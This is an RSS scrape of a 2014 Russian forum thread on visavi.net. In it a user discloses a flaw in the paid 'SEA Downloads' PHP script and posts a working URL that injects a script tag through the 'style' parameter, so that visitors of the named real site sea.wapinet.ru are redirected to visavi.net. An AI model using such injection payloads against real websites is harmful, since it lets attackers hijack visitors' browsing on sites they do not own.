Уязвимость SEA Downoloads - Visavi.net https://visavi.net/ RSS - Visavi.net https://visavi.net/assets/img/images/logo_small.png RSS - Visavi.net https://visavi.net/ [email protected] (admin) [email protected] (admin) Fri, 26 Apr 2024 13:32:05 +0300 Точняк https://visavi.net/topics/41673/674552 Уязвимость SEA Downoloads Влад Mon, 08 Dec 2014 15:00:55 +0300 Сообщения https://visavi.net/topics/41673/674552 Собственно платный движек:<br> <a href="http://wapinet.ru/buy_php_scripts" target="_blank" rel="nofollow">http://wapinet.ru/buy_php_scripts</a><br> Пример:<br> <a href="http://sea.wapinet.ru/" target="_blank" rel="nofollow">http://sea.wapinet.ru/</a><br> <br> Уязвимость:<br> <a href="//sea.wapinet.ru/?url=somebody.com&amp;style=sea.wapinet.ru/style/style.css&quot;&gt;&lt;script&gt;location.href=&quot;//visavi.net&quot;;&lt;/script&gt;">http://sea.wapinet.ru/?url=somebody.com&amp;style=sea.wapinet.ru/style/style.css&quot;&gt;&lt;script&gt;location.href=&quot;//visavi.net&quot;;&lt;/script&gt;</a><br> <br> Если хотя бы раз подключить юзера к этому линку,то при переходе на<br> <a href="http://sea.wapinet.ru" target="_blank" rel="nofollow">http://sea.wapinet.ru</a><br> его будет бросать на <a href="//visavi.net">http://visavi.net</a> <img src="https://visavi.net/uploads/stickers/smile.gif" alt="smile"> https://visavi.net/topics/41673/674551 Уязвимость SEA Downoloads VITAMIN Mon, 08 Dec 2014 14:28:13 +0300 Сообщения https://visavi.net/topics/41673/674551